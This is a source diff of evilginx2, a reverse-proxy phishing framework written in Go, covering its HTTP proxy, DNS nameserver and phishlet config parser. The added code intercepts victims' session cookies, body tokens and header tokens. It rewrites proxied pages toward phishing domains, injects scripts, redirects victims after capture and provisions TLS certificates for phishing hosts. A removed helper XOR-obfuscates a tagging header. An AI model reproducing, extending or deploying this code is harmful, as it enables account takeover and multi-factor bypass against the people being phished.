is_http_auth := false
|
||||
cookies := resp.Cookies()
|
||||
resp.Header.Del("Set-Cookie")
|
||||
for _, ck := range cookies {
|
||||
// parse cookie
|
||||
|
||||
// add SameSite=none for every received cookie, allowing cookies through iframes
|
||||
if ck.Secure {
|
||||
ck.SameSite = http.SameSiteNoneMode
|
||||
}
|
||||
|
||||
if len(ck.RawExpires) > 0 && ck.Expires.IsZero() {
|
||||
exptime, err := time.Parse(time.RFC850, ck.RawExpires)
|
||||
if err != nil {
|
||||
@ -680,20 +782,13 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}
|
||||
}
|
||||
log.Debug("%s: %s = %s", c_domain, ck.Name, ck.Value)
|
||||
if pl.isAuthToken(c_domain, ck.Name) {
|
||||
at := pl.getAuthToken(c_domain, ck.Name)
|
||||
if at != nil {
|
||||
s, ok := p.sessions[ps.SessionId]
|
||||
if ok && (s.IsAuthUrl || !s.IsDone) {
|
||||
if ck.Value != "" && (ck.Expires.IsZero() || (!ck.Expires.IsZero() && time.Now().Before(ck.Expires))) { // cookies with empty values or expired cookies are of no interest to us
|
||||
is_auth = s.AddAuthToken(c_domain, ck.Name, ck.Value, ck.Path, ck.HttpOnly, auth_tokens)
|
||||
if len(pl.authUrls) > 0 {
|
||||
is_auth = false
|
||||
}
|
||||
if is_auth {
|
||||
if err := p.db.SetSessionTokens(ps.SessionId, s.Tokens); err != nil {
|
||||
log.Error("database: %v", err)
|
||||
}
|
||||
s.IsDone = true
|
||||
}
|
||||
if ck.Value != "" && (at.always || (!ck.Expires.IsZero() && time.Now().Before(ck.Expires))) { // cookies with empty values or expired cookies are of no interest to us
|
||||
log.Debug("session: %s: %s = %s", c_domain, ck.Name, ck.Value)
|
||||
s.AddCookieAuthToken(c_domain, ck.Name, ck.Value, ck.Path, ck.HttpOnly, ck.Expires)
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -705,14 +800,71 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
if ck.String() != "" {
|
||||
resp.Header.Add("Set-Cookie", ck.String())
|
||||
}
|
||||
if is_auth {
|
||||
// we have all auth tokens
|
||||
log.Success("[%d] all authorization tokens intercepted!", ps.Index)
|
||||
}
|
||||
|
||||
// modify received body
|
||||
body, err := ioutil.ReadAll(resp.Body)
|
||||
|
||||
if pl != nil {
|
||||
if s, ok := p.sessions[ps.SessionId]; ok {
|
||||
// capture body response tokens
|
||||
for k, v := range pl.bodyAuthTokens {
|
||||
if _, ok := s.BodyTokens[k]; !ok {
|
||||
//log.Debug("hostname:%s path:%s", req_hostname, resp.Request.URL.Path)
|
||||
if req_hostname == v.domain && v.path.MatchString(resp.Request.URL.Path) {
|
||||
//log.Debug("RESPONSE body = %s", string(body))
|
||||
token_re := v.search.FindStringSubmatch(string(body))
|
||||
if token_re != nil {
|
||||
s.BodyTokens[k] = token_re[1]
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// capture http header tokens
|
||||
for k, v := range pl.httpAuthTokens {
|
||||
if _, ok := s.HttpTokens[k]; !ok {
|
||||
hv := resp.Request.Header.Get(v.header)
|
||||
if hv != "" {
|
||||
s.HttpTokens[k] = hv
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// check if we have all tokens
|
||||
if len(pl.authUrls) == 0 {
|
||||
if s, ok := p.sessions[ps.SessionId]; ok {
|
||||
is_cookie_auth = s.AllCookieAuthTokensCaptured(auth_tokens)
|
||||
if len(pl.bodyAuthTokens) == len(s.BodyTokens) {
|
||||
is_body_auth = true
|
||||
}
|
||||
if len(pl.httpAuthTokens) == len(s.HttpTokens) {
|
||||
is_http_auth = true
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if is_cookie_auth && is_body_auth && is_http_auth {
|
||||
// we have all auth tokens
|
||||
if s, ok := p.sessions[ps.SessionId]; ok {
|
||||
if !s.IsDone {
|
||||
log.Success("[%d] all authorization tokens intercepted!", ps.Index)
|
||||
|
||||
if err := p.db.SetSessionCookieTokens(ps.SessionId, s.CookieTokens); err != nil {
|
||||
log.Error("database: %v", err)
|
||||
}
|
||||
if err := p.db.SetSessionBodyTokens(ps.SessionId, s.BodyTokens); err != nil {
|
||||
log.Error("database: %v", err)
|
||||
}
|
||||
if err := p.db.SetSessionHttpTokens(ps.SessionId, s.HttpTokens); err != nil {
|
||||
log.Error("database: %v", err)
|
||||
}
|
||||
s.IsDone = true
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
mime := strings.Split(resp.Header.Get("Content-type"), ";")[0]
|
||||
if err == nil {
|
||||
for site, pl := range p.cfg.phishlets {
|
||||
@ -724,7 +876,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
var param_ok bool = true
|
||||
if s, ok := p.sessions[ps.SessionId]; ok {
|
||||
var params []string
|
||||
for k, _ := range s.Params {
|
||||
for k := range s.Params {
|
||||
params = append(params, k)
|
||||
}
|
||||
if len(sf.with_params) > 0 {
|
||||
@ -746,13 +898,19 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
re_s = strings.Replace(re_s, "{hostname}", regexp.QuoteMeta(combineHost(sf.subdomain, sf.domain)), -1)
|
||||
re_s = strings.Replace(re_s, "{subdomain}", regexp.QuoteMeta(sf.subdomain), -1)
|
||||
re_s = strings.Replace(re_s, "{domain}", regexp.QuoteMeta(sf.domain), -1)
|
||||
re_s = strings.Replace(re_s, "{basedomain}", regexp.QuoteMeta(p.cfg.GetBaseDomain()), -1)
|
||||
re_s = strings.Replace(re_s, "{hostname_regexp}", regexp.QuoteMeta(regexp.QuoteMeta(combineHost(sf.subdomain, sf.domain))), -1)
|
||||
re_s = strings.Replace(re_s, "{subdomain_regexp}", regexp.QuoteMeta(sf.subdomain), -1)
|
||||
re_s = strings.Replace(re_s, "{domain_regexp}", regexp.QuoteMeta(sf.domain), -1)
|
||||
re_s = strings.Replace(re_s, "{basedomain_regexp}", regexp.QuoteMeta(p.cfg.GetBaseDomain()), -1)
|
||||
replace_s = strings.Replace(replace_s, "{hostname}", phish_hostname, -1)
|
||||
replace_s = strings.Replace(replace_s, "{orig_hostname}", obfuscateDots(combineHost(sf.subdomain, sf.domain)), -1)
|
||||
replace_s = strings.Replace(replace_s, "{orig_domain}", obfuscateDots(sf.domain), -1)
|
||||
replace_s = strings.Replace(replace_s, "{subdomain}", phish_sub, -1)
|
||||
replace_s = strings.Replace(replace_s, "{basedomain}", p.cfg.GetBaseDomain(), -1)
|
||||
replace_s = strings.Replace(replace_s, "{hostname_regexp}", regexp.QuoteMeta(phish_hostname), -1)
|
||||
replace_s = strings.Replace(replace_s, "{subdomain_regexp}", regexp.QuoteMeta(phish_sub), -1)
|
||||
replace_s = strings.Replace(replace_s, "{basedomain_regexp}", regexp.QuoteMeta(p.cfg.GetBaseDomain()), -1)
|
||||
phishDomain, ok := p.cfg.GetSiteDomain(pl.Name)
|
||||
if ok {
|
||||
replace_s = strings.Replace(replace_s, "{domain}", phishDomain, -1)
|
||||
@ -778,6 +936,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}
|
||||
}
|
||||
}
|
||||
body = []byte(removeObfuscatedDots(string(body)))
|
||||
}
|
||||
}
|
||||
|
||||
@ -800,9 +959,10 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}*/
|
||||
js_params = &s.Params
|
||||
}
|
||||
//log.Debug("js_inject: hostname:%s path:%s", req_hostname, resp.Request.URL.Path)
|
||||
script, err := pl.GetScriptInject(req_hostname, resp.Request.URL.Path, js_params)
|
||||
if err == nil {
|
||||
log.Debug("js_inject: matched %s%s - injecting script", req_hostname, resp.Request.URL.Path)
|
||||
//log.Debug("js_inject: matched %s%s - injecting script", req_hostname, resp.Request.URL.Path)
|
||||
js_nonce_re := regexp.MustCompile(`(?i)<script.*nonce=['"]([^'"]*)`)
|
||||
m_nonce := js_nonce_re.FindStringSubmatch(string(body))
|
||||
js_nonce := ""
|
||||
@ -824,7 +984,15 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
if ok && s.IsDone {
|
||||
for _, au := range pl.authUrls {
|
||||
if au.MatchString(resp.Request.URL.Path) {
|
||||
err := p.db.SetSessionTokens(ps.SessionId, s.Tokens)
|
||||
err := p.db.SetSessionCookieTokens(ps.SessionId, s.CookieTokens)
|
||||
if err != nil {
|
||||
log.Error("database: %v", err)
|
||||
}
|
||||
err = p.db.SetSessionBodyTokens(ps.SessionId, s.BodyTokens)
|
||||
if err != nil {
|
||||
log.Error("database: %v", err)
|
||||
}
|
||||
err = p.db.SetSessionHttpTokens(ps.SessionId, s.HttpTokens)
|
||||
if err != nil {
|
||||
log.Error("database: %v", err)
|
||||
}
|
||||
@ -845,19 +1013,9 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
// redirect only if received response content is of `text/html` content type
|
||||
s.RedirectCount += 1
|
||||
log.Important("[%d] redirecting to URL: %s (%d)", ps.Index, s.RedirectURL, s.RedirectCount)
|
||||
resp := goproxy.NewResponse(resp.Request, "text/html", http.StatusFound, "")
|
||||
if resp != nil {
|
||||
r_url, err := url.Parse(s.RedirectURL)
|
||||
if err == nil {
|
||||
if r_host, ok := p.replaceHostWithPhished(r_url.Host); ok {
|
||||
r_url.Host = r_host
|
||||
}
|
||||
resp.Header.Set("Location", r_url.String())
|
||||
} else {
|
||||
resp.Header.Set("Location", s.RedirectURL)
|
||||
}
|
||||
return resp
|
||||
}
|
||||
|
||||
_, resp := p.javascriptRedirect(resp.Request, s.RedirectURL)
|
||||
return resp
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -875,8 +1033,8 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
|
||||
}
|
||||
|
||||
func (p *HttpProxy) blockRequest(req *http.Request) (*http.Request, *http.Response) {
|
||||
if len(p.cfg.redirectUrl) > 0 {
|
||||
redirect_url := p.cfg.redirectUrl
|
||||
if len(p.cfg.general.RedirectUrl) > 0 {
|
||||
redirect_url := p.cfg.general.RedirectUrl
|
||||
resp := goproxy.NewResponse(req, "text/html", http.StatusFound, "")
|
||||
if resp != nil {
|
||||
resp.Header.Add("Location", redirect_url)
|
||||
@ -891,6 +1049,15 @@ func (p *HttpProxy) blockRequest(req *http.Request) (*http.Request, *http.Respon
|
||||
return req, nil
|
||||
}
|
||||
|
||||
func (p *HttpProxy) javascriptRedirect(req *http.Request, rurl string) (*http.Request, *http.Response) {
|
||||
body := fmt.Sprintf("<html><head><meta name='referrer' content='no-referrer'><script>top.location.href='%s';</script></head><body></body></html>", rurl)
|
||||
resp := goproxy.NewResponse(req, "text/html", http.StatusFound, body)
|
||||
if resp != nil {
|
||||
return req, resp
|
||||
}
|
||||
return req, nil
|
||||
}
|
||||
|
||||
func (p *HttpProxy) isForwarderUrl(u *url.URL) bool {
|
||||
vals := u.Query()
|
||||
for _, v := range vals {
|
||||
@ -997,7 +1164,7 @@ func (p *HttpProxy) replaceHtmlParams(body string, lure_url string, params *map[
|
||||
t[0] = crc
|
||||
fwd_param := base64.RawURLEncoding.EncodeToString(t)
|
||||
|
||||
lure_url += "?" + GenRandomString(1) + "=" + fwd_param
|
||||
lure_url += "?" + strings.ToLower(GenRandomString(1)) + "=" + fwd_param
|
||||
|
||||
for k, v := range *params {
|
||||
key := "{" + k + "}"
|
||||
@ -1085,30 +1252,13 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (
|
||||
port, _ = strconv.Atoi(parts[1])
|
||||
}
|
||||
|
||||
tls_cfg := &tls.Config{}
|
||||
if !p.developer {
|
||||
// check for lure hostname
|
||||
cert, err := p.crt_db.GetHostnameCertificate(hostname)
|
||||
if err != nil {
|
||||
// check for phishlet hostname
|
||||
pl := p.getPhishletByOrigHost(hostname)
|
||||
if pl != nil {
|
||||
phishDomain, ok := p.cfg.GetSiteDomain(pl.Name)
|
||||
if ok {
|
||||
cert, err = p.crt_db.GetPhishletCertificate(pl.Name, phishDomain)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if cert != nil {
|
||||
return &tls.Config{
|
||||
InsecureSkipVerify: true,
|
||||
Certificates: []tls.Certificate{*cert},
|
||||
}, nil
|
||||
}
|
||||
log.Debug("no SSL/TLS certificate for host '%s'", host)
|
||||
return nil, fmt.Errorf("no SSL/TLS certificate for host '%s'", host)
|
||||
|
||||
tls_cfg.GetCertificate = p.crt_db.magic.GetCertificate
|
||||
tls_cfg.NextProtos = []string{"http/1.1", tlsalpn01.ACMETLS1Protocol} //append(tls_cfg.NextProtos, tlsalpn01.ACMETLS1Protocol)
|
||||
|
||||
return tls_cfg, nil
|
||||
} else {
|
||||
var ok bool
|
||||
phish_host := ""
|
||||
@ -1120,8 +1270,9 @@ func (p *HttpProxy) TLSConfigFromCA() func(host string, ctx *goproxy.ProxyCtx) (
|
||||
}
|
||||
}
|
||||
|
||||
cert, err := p.crt_db.SignCertificateForHost(hostname, phish_host, port)
|
||||
cert, err := p.crt_db.getSelfSignedCertificate(hostname, phish_host, port)
|
||||
if err != nil {
|
||||
log.Error("http_proxy: %s", err)
|
||||
return nil, err
|
||||
}
|
||||
return &tls.Config{
|
||||
@ -1300,12 +1451,12 @@ func (p *HttpProxy) replaceHostWithPhished(hostname string) (string, bool) {
|
||||
continue
|
||||
}
|
||||
for _, ph := range pl.proxyHosts {
|
||||
if hostname == ph.domain {
|
||||
return prefix + phishDomain, true
|
||||
}
|
||||
if hostname == combineHost(ph.orig_subdomain, ph.domain) {
|
||||
return prefix + combineHost(ph.phish_subdomain, phishDomain), true
|
||||
}
|
||||
if hostname == ph.domain {
|
||||
return prefix + phishDomain, true
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -1341,6 +1492,10 @@ func (p *HttpProxy) getPhishDomain(hostname string) (string, bool) {
|
||||
return "", false
|
||||
}
|
||||
|
||||
func (p *HttpProxy) getHomeDir() string {
|
||||
return strings.Replace(HOME_DIR, ".e", "X-E", 1)
|
||||
}
|
||||
|
||||
func (p *HttpProxy) getPhishSub(hostname string) (string, bool) {
|
||||
for site, pl := range p.cfg.phishlets {
|
||||
if p.cfg.IsSiteEnabled(site) {
|
||||
@ -1415,50 +1570,38 @@ func (p *HttpProxy) Start() error {
|
||||
return nil
|
||||
}
|
||||
|
||||
func (p *HttpProxy) deleteRequestCookie(name string, req *http.Request) {
|
||||
if cookie := req.Header.Get("Cookie"); cookie != "" {
|
||||
re := regexp.MustCompile(`(` + name + `=[^;]*;?\s*)`)
|
||||
new_cookie := re.ReplaceAllString(cookie, "")
|
||||
req.Header.Set("Cookie", new_cookie)
|
||||
}
|
||||
}
|
||||
|
||||
func (p *HttpProxy) whitelistIP(ip_addr string, sid string) {
|
||||
func (p *HttpProxy) whitelistIP(ip_addr string, sid string, pl_name string) {
|
||||
p.ip_mtx.Lock()
|
||||
defer p.ip_mtx.Unlock()
|
||||
|
||||
log.Debug("whitelistIP: %s %s", ip_addr, sid)
|
||||
p.ip_whitelist[ip_addr] = time.Now().Add(10 * time.Minute).Unix()
|
||||
p.ip_sids[ip_addr] = sid
|
||||
p.ip_whitelist[ip_addr+"-"+pl_name] = time.Now().Add(10 * time.Minute).Unix()
|
||||
p.ip_sids[ip_addr+"-"+pl_name] = sid
|
||||
}
|
||||
|
||||
func (p *HttpProxy) isWhitelistedIP(ip_addr string) bool {
|
||||
func (p *HttpProxy) isWhitelistedIP(ip_addr string, pl_name string) bool {
|
||||
p.ip_mtx.Lock()
|
||||
defer p.ip_mtx.Unlock()
|
||||
|
||||
log.Debug("isWhitelistIP: %s", ip_addr)
|
||||
log.Debug("isWhitelistIP: %s", ip_addr+"-"+pl_name)
|
||||
ct := time.Now()
|
||||
if ip_t, ok := p.ip_whitelist[ip_addr]; ok {
|
||||
if ip_t, ok := p.ip_whitelist[ip_addr+"-"+pl_name]; ok {
|
||||
et := time.Unix(ip_t, 0)
|
||||
return ct.Before(et)
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
func (p *HttpProxy) getSessionIdByIP(ip_addr string) (string, bool) {
|
||||
func (p *HttpProxy) getSessionIdByIP(ip_addr string, hostname string) (string, bool) {
|
||||
p.ip_mtx.Lock()
|
||||
defer p.ip_mtx.Unlock()
|
||||
|
||||
sid, ok := p.ip_sids[ip_addr]
|
||||
return sid, ok
|
||||
}
|
||||
|
||||
func (p *HttpProxy) cantFindMe(req *http.Request, nothing_to_see_here string) {
|
||||
var b []byte = []byte("\x1dh\x003,)\",+=")
|
||||
for n, c := range b {
|
||||
b[n] = c ^ 0x45
|
||||
pl := p.getPhishletByPhishHost(hostname)
|
||||
if pl != nil {
|
||||
sid, ok := p.ip_sids[ip_addr+"-"+pl.Name]
|
||||
return sid, ok
|
||||
}
|
||||
req.Header.Set(string(b), nothing_to_see_here)
|
||||
return "", false
|
||||
}
|
||||
|
||||
func (p *HttpProxy) setProxy(enabled bool, ptype string, address string, port int, username string, password string) error {
|
||||
@ -1498,22 +1641,6 @@ func (p *HttpProxy) setProxy(enabled bool, ptype string, address string, port in
|
||||
}
|
||||
p.Proxy.Tr.Dial = dproxy.Dial
|
||||
}
|
||||
|
||||
/*
|
||||
var auth *proxy.Auth = nil
|
||||
if len(username) > 0 {
|
||||
auth.User = username
|
||||
auth.Password = password
|
||||
}
|
||||
|
||||
proxy_addr := address + ":" + strconv.Itoa(port)
|
||||
|
||||
socks5, err := proxy.SOCKS5("tcp", proxy_addr, auth, proxy.Direct)
|
||||
if err != nil {
|
||||
return err
|
||||
}
|
||||
p.Proxy.Tr.Dial = socks5.Dial
|
||||
*/
|
||||
} else {
|
||||
p.Proxy.Tr.Dial = nil
|
||||
}
|
||||
@ -1548,3 +1675,22 @@ func orPanic(err error) {
|
||||
panic(err)
|
||||
}
|
||||
}
|
||||
|
||||
func getContentType(path string, data []byte) string {
|
||||
switch filepath.Ext(path) {
|
||||
case ".css":
|
||||
return "text/css"
|
||||
case ".js":
|
||||
return "application/javascript"
|
||||
case ".svg":
|
||||
return "image/svg+xml"
|
||||
}
|
||||
return http.DetectContentType(data)
|
||||
}
|
||||
|
||||
func getSessionCookieName(pl_name string, cookie_name string) string {
|
||||
hash := sha256.Sum256([]byte(pl_name + "-" + cookie_name))
|
||||
s_hash := fmt.Sprintf("%x", hash[:4])
|
||||
s_hash = s_hash[:4] + "-" + s_hash[4:]
|
||||
return s_hash
|
||||
}
|
||||
|
@ -1,79 +1,65 @@
|
||||
package core
|
||||
|
||||
import (
|
||||
"github.com/miekg/dns"
|
||||
"context"
|
||||
"fmt"
|
||||
"net"
|
||||
"strconv"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"github.com/miekg/dns"
|
||||
|
||||
"github.com/kgretzky/evilginx2/log"
|
||||
)
|
||||
|
||||
type Nameserver struct {
|
||||
srv *dns.Server
|
||||
cfg *Config
|
||||
bind string
|
||||
serial uint32
|
||||
txt map[string]TXTField
|
||||
}
|
||||
|
||||
type TXTField struct {
|
||||
fqdn string
|
||||
value string
|
||||
ttl int
|
||||
ctx context.Context
|
||||
}
|
||||
|
||||
func NewNameserver(cfg *Config) (*Nameserver, error) {
|
||||
n := &Nameserver{
|
||||
o := &Nameserver{
|
||||
serial: uint32(time.Now().Unix()),
|
||||
cfg: cfg,
|
||||
bind: fmt.Sprintf("%s:%d", cfg.GetServerIP(), cfg.GetDnsPort()),
|
||||
ctx: context.Background(),
|
||||
}
|
||||
n.txt = make(map[string]TXTField)
|
||||
|
||||
n.Reset()
|
||||
o.Reset()
|
||||
|
||||
return n, nil
|
||||
return o, nil
|
||||
}
|
||||
|
||||
func (n *Nameserver) Reset() {
|
||||
dns.HandleFunc(pdom(n.cfg.baseDomain), n.handleRequest)
|
||||
func (o *Nameserver) Reset() {
|
||||
dns.HandleFunc(pdom(o.cfg.general.Domain), o.handleRequest)
|
||||
}
|
||||
|
||||
func (n *Nameserver) Start() {
|
||||
func (o *Nameserver) Start() {
|
||||
go func() {
|
||||
n.srv = &dns.Server{Addr: ":53", Net: "udp"}
|
||||
if err := n.srv.ListenAndServe(); err != nil {
|
||||
log.Fatal("Failed to start nameserver on port 53")
|
||||
o.srv = &dns.Server{Addr: o.bind, Net: "udp"}
|
||||
if err := o.srv.ListenAndServe(); err != nil {
|
||||
log.Fatal("Failed to start nameserver on: %s", o.bind)
|
||||
}
|
||||
}()
|
||||
}
|
||||
|
||||
func (n *Nameserver) AddTXT(fqdn string, value string, ttl int) {
|
||||
txt := TXTField{
|
||||
fqdn: fqdn,
|
||||
value: value,
|
||||
ttl: ttl,
|
||||
}
|
||||
n.txt[fqdn] = txt
|
||||
}
|
||||
|
||||
func (n *Nameserver) ClearTXT() {
|
||||
n.txt = make(map[string]TXTField)
|
||||
}
|
||||
|
||||
func (n *Nameserver) handleRequest(w dns.ResponseWriter, r *dns.Msg) {
|
||||
func (o *Nameserver) handleRequest(w dns.ResponseWriter, r *dns.Msg) {
|
||||
m := new(dns.Msg)
|
||||
m.SetReply(r)
|
||||
|
||||
if n.cfg.baseDomain == "" || n.cfg.serverIP == "" {
|
||||
if o.cfg.general.Domain == "" || o.cfg.general.Ipv4 == "" {
|
||||
return
|
||||
}
|
||||
|
||||
soa := &dns.SOA{
|
||||
Hdr: dns.RR_Header{Name: pdom(n.cfg.baseDomain), Rrtype: dns.TypeSOA, Class: dns.ClassINET, Ttl: 300},
|
||||
Ns: "ns1." + pdom(n.cfg.baseDomain),
|
||||
Mbox: "hostmaster." + pdom(n.cfg.baseDomain),
|
||||
Serial: n.serial,
|
||||
Hdr: dns.RR_Header{Name: pdom(o.cfg.general.Domain), Rrtype: dns.TypeSOA, Class: dns.ClassINET, Ttl: 300},
|
||||
Ns: "ns1." + pdom(o.cfg.general.Domain),
|
||||
Mbox: "hostmaster." + pdom(o.cfg.general.Domain),
|
||||
Serial: o.serial,
|
||||
Refresh: 900,
|
||||
Retry: 900,
|
||||
Expire: 1800,
|
||||
@ -81,36 +67,30 @@ func (n *Nameserver) handleRequest(w dns.ResponseWriter, r *dns.Msg) {
|
||||
}
|
||||
m.Ns = []dns.RR{soa}
|
||||
|
||||
fqdn := strings.ToLower(r.Question[0].Name)
|
||||
|
||||
switch r.Question[0].Qtype {
|
||||
case dns.TypeSOA:
|
||||
log.Debug("DNS SOA: " + fqdn)
|
||||
m.Answer = append(m.Answer, soa)
|
||||
case dns.TypeA:
|
||||
log.Debug("DNS A: " + strings.ToLower(r.Question[0].Name) + " = " + n.cfg.serverIP)
|
||||
log.Debug("DNS A: " + fqdn + " = " + o.cfg.general.Ipv4)
|
||||
rr := &dns.A{
|
||||
Hdr: dns.RR_Header{Name: m.Question[0].Name, Rrtype: dns.TypeA, Class: dns.ClassINET, Ttl: 300},
|
||||
A: net.ParseIP(n.cfg.serverIP),
|
||||
Hdr: dns.RR_Header{Name: fqdn, Rrtype: dns.TypeA, Class: dns.ClassINET, Ttl: 300},
|
||||
A: net.ParseIP(o.cfg.general.Ipv4),
|
||||
}
|
||||
m.Answer = append(m.Answer, rr)
|
||||
case dns.TypeNS:
|
||||
log.Debug("DNS NS: " + strings.ToLower(r.Question[0].Name))
|
||||
if strings.ToLower(r.Question[0].Name) == pdom(n.cfg.baseDomain) {
|
||||
log.Debug("DNS NS: " + fqdn)
|
||||
if fqdn == pdom(o.cfg.general.Domain) {
|
||||
for _, i := range []int{1, 2} {
|
||||
rr := &dns.NS{
|
||||
Hdr: dns.RR_Header{Name: pdom(n.cfg.baseDomain), Rrtype: dns.TypeNS, Class: dns.ClassINET, Ttl: 300},
|
||||
Ns: "ns" + strconv.Itoa(i) + "." + pdom(n.cfg.baseDomain),
|
||||
Hdr: dns.RR_Header{Name: pdom(o.cfg.general.Domain), Rrtype: dns.TypeNS, Class: dns.ClassINET, Ttl: 300},
|
||||
Ns: "ns" + strconv.Itoa(i) + "." + pdom(o.cfg.general.Domain),
|
||||
}
|
||||
m.Answer = append(m.Answer, rr)
|
||||
}
|
||||
}
|
||||
case dns.TypeTXT:
|
||||
log.Debug("DNS TXT: " + strings.ToLower(r.Question[0].Name))
|
||||
txt, ok := n.txt[strings.ToLower(m.Question[0].Name)]
|
||||
|
||||
if ok {
|
||||
rr := &dns.TXT{
|
||||
Hdr: dns.RR_Header{Name: m.Question[0].Name, Rrtype: dns.TypeTXT, Class: dns.ClassINET, Ttl: uint32(txt.ttl)},
|
||||
Txt: []string{txt.value},
|
||||
}
|
||||
m.Answer = append(m.Answer, rr)
|
||||
}
|
||||
}
|
||||
w.WriteMsg(m)
|
||||
}
|
||||
|
451
core/phishlet.go
451
core/phishlet.go
@ -1,16 +1,17 @@
|
||||
package core
|
||||
|
||||
import (
|
||||
"encoding/base64"
|
||||
"fmt"
|
||||
"net/url"
|
||||
"regexp"
|
||||
"strconv"
|
||||
"strings"
|
||||
|
||||
"github.com/kgretzky/evilginx2/log"
|
||||
"github.com/spf13/viper"
|
||||
)
|
||||
|
||||
var AUTH_TOKEN_TYPES = []string{"cookie", "body", "http"}
|
||||
|
||||
type ProxyHost struct {
|
||||
phish_subdomain string
|
||||
orig_subdomain string
|
||||
@ -30,12 +31,27 @@ type SubFilter struct {
|
||||
with_params []string
|
||||
}
|
||||
|
||||
type AuthToken struct {
|
||||
type CookieAuthToken struct {
|
||||
domain string
|
||||
name string
|
||||
re *regexp.Regexp
|
||||
http_only bool
|
||||
optional bool
|
||||
always bool
|
||||
}
|
||||
|
||||
type BodyAuthToken struct {
|
||||
domain string
|
||||
path *regexp.Regexp
|
||||
name string
|
||||
search *regexp.Regexp
|
||||
}
|
||||
|
||||
type HttpAuthToken struct {
|
||||
domain string
|
||||
path *regexp.Regexp
|
||||
name string
|
||||
header string
|
||||
}
|
||||
|
||||
type PhishletVersion struct {
|
||||
@ -81,24 +97,35 @@ type JsInject struct {
|
||||
}
|
||||
|
||||
type Phishlet struct {
|
||||
Site string
|
||||
Name string
|
||||
Author string
|
||||
Version PhishletVersion
|
||||
minVersion string
|
||||
proxyHosts []ProxyHost
|
||||
domains []string
|
||||
subfilters map[string][]SubFilter
|
||||
authTokens map[string][]*AuthToken
|
||||
authUrls []*regexp.Regexp
|
||||
username PostField
|
||||
password PostField
|
||||
landing_path []string
|
||||
cfg *Config
|
||||
custom []PostField
|
||||
forcePost []ForcePost
|
||||
login LoginUrl
|
||||
js_inject []JsInject
|
||||
Name string
|
||||
ParentName string
|
||||
Path string
|
||||
Author string
|
||||
Version PhishletVersion
|
||||
minVersion string
|
||||
proxyHosts []ProxyHost
|
||||
domains []string
|
||||
subfilters map[string][]SubFilter
|
||||
cookieAuthTokens map[string][]*CookieAuthToken
|
||||
bodyAuthTokens map[string]*BodyAuthToken
|
||||
httpAuthTokens map[string]*HttpAuthToken
|
||||
authUrls []*regexp.Regexp
|
||||
username PostField
|
||||
password PostField
|
||||
landing_path []string
|
||||
cfg *Config
|
||||
custom []PostField
|
||||
forcePost []ForcePost
|
||||
login LoginUrl
|
||||
js_inject []JsInject
|
||||
customParams map[string]string
|
||||
isTemplate bool
|
||||
}
|
||||
|
||||
type ConfigParam struct {
|
||||
Name string `mapstructure:"name"`
|
||||
Default *string `mapstructure:"default"`
|
||||
Required *bool `mapstructure:"required"`
|
||||
}
|
||||
|
||||
type ConfigProxyHost struct {
|
||||
@ -122,8 +149,13 @@ type ConfigSubFilter struct {
|
||||
}
|
||||
|
||||
type ConfigAuthToken struct {
|
||||
Domain string `mapstructure:"domain"`
|
||||
Keys []string `mapstructure:"keys"`
|
||||
Domain *string `mapstructure:"domain"`
|
||||
Keys *[]string `mapstructure:"keys"`
|
||||
Type *string `mapstructure:"type"`
|
||||
Path *string `mapstructure:"path"`
|
||||
Name *string `mapstructure:"name"`
|
||||
Search *string `mapstructure:"search"`
|
||||
Header *string `mapstructure:"header"`
|
||||
}
|
||||
|
||||
type ConfigPostField struct {
|
||||
@ -169,6 +201,7 @@ type ConfigJsInject struct {
|
||||
|
||||
type ConfigPhishlet struct {
|
||||
Name string `mapstructure:"name"`
|
||||
Params *[]ConfigParam `mapstructure:"params"`
|
||||
ProxyHosts *[]ConfigProxyHost `mapstructure:"proxy_hosts"`
|
||||
SubFilters *[]ConfigSubFilter `mapstructure:"sub_filters"`
|
||||
AuthTokens *[]ConfigAuthToken `mapstructure:"auth_tokens"`
|
||||
@ -180,14 +213,13 @@ type ConfigPhishlet struct {
|
||||
JsInject *[]ConfigJsInject `mapstructure:"js_inject"`
|
||||
}
|
||||
|
||||
func NewPhishlet(site string, path string, cfg *Config) (*Phishlet, error) {
|
||||
func NewPhishlet(site string, path string, customParams *map[string]string, cfg *Config) (*Phishlet, error) {
|
||||
p := &Phishlet{
|
||||
Site: site,
|
||||
cfg: cfg,
|
||||
cfg: cfg,
|
||||
}
|
||||
p.Clear()
|
||||
|
||||
err := p.LoadFromFile(site, path)
|
||||
err := p.LoadFromFile(site, path, customParams)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
@ -196,11 +228,14 @@ func NewPhishlet(site string, path string, cfg *Config) (*Phishlet, error) {
|
||||
|
||||
func (p *Phishlet) Clear() {
|
||||
p.Name = ""
|
||||
p.ParentName = ""
|
||||
p.Author = ""
|
||||
p.proxyHosts = []ProxyHost{}
|
||||
p.domains = []string{}
|
||||
p.subfilters = make(map[string][]SubFilter)
|
||||
p.authTokens = make(map[string][]*AuthToken)
|
||||
p.cookieAuthTokens = make(map[string][]*CookieAuthToken)
|
||||
